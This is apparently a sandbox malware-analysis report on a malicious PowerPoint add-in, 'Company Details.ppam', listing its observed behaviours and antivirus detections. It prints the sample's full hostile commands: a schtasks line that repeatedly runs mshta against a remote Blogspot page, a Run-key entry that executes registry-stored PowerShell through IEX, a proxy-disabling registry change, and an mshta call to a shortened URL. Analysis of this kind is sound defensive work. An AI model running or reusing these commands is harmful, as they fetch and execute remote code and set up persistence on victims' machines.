cmdline	"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 80 /tn ""WIND0WSUPLATE"" /F /tr ""\""mshta\""vbscript:Execute("\"CreateObject(""\""Wscript.Shell""\"").Run ""\""mshta http://1230948%1230948@randikhanaekminar.blogspot.com/p/divine111.html""\"", 0 : window.close"\")
cmdline	schtasks /create /sc MINUTE /mo 80 /tn ""WIND0WSUPLATE"" /F /tr ""\""mshta\""vbscript:Execute("\"CreateObject(""\""Wscript.Shell""\"").Run ""\""mshta http://1230948%1230948@randikhanaekminar.blogspot.com/p/divine111.html""\"", 0 : window.close"\")

Disables proxy possibly for traffic interception (1 event)

Time & API	Arguments	Status	Return	Repeated
RegSetValueExA April 30, 2021, 9:43 a.m.	key_handle: 0x000002d0 regkey_r: ProxyEnable reg_type: 4 (REG_DWORD) value: 0 regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable	1	0	0

File has been identified by 15 AntiVirus engines on VirusTotal as malicious (15 events)

Alibaba	TrojanDownloader:VBA/MalDoc.ali1000101
Arcabit	VBA:Amphitryon.227
Kaspersky	HEUR:Trojan.MSOffice.SAgent.gen
BitDefender	VBA:Amphitryon.227
NANO-Antivirus	Trojan.Ole2.Vbs-heuristic.druvzi
MicroWorld-eScan	VBA:Amphitryon.227
Ad-Aware	VBA:Amphitryon.227
McAfee-GW-Edition	Artemis!Trojan
FireEye	VBA:Amphitryon.227
Emsisoft	VBA:Amphitryon.227 (B)
Ikarus	Trojan-Downloader.VBA.Agent
GData	VBA:Amphitryon.227
AegisLab	Trojan.MSOffice.SAgent.4!c
SentinelOne	Static AI - Malicious OPENXML
Fortinet	VBA/Agent.3FED!tr

Stores PowerShell commands in the registry likely for persistence (1 event)

Time & API	Arguments	Status	Return	Repeated
RegSetValueExA April 30, 2021, 9:43 a.m.	key_handle: 0x000006b8 regkey_r: DLESOLCRETSAM reg_type: 1 (REG_SZ) value: mshta vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""powershell ((gp HKCU:\Software).MSOFFICELO)\|IEX"", 0 : window.close") regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\DLESOLCRETSAM	1	0	0

One or more non-whitelisted processes were created (1 event)

parent_process

powerpnt.exe

martian_process

mshta http://www.j.mp/ddsobpechateessentesathatesesjdw

Generates some ICMP traffic

Company Details.ppam

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All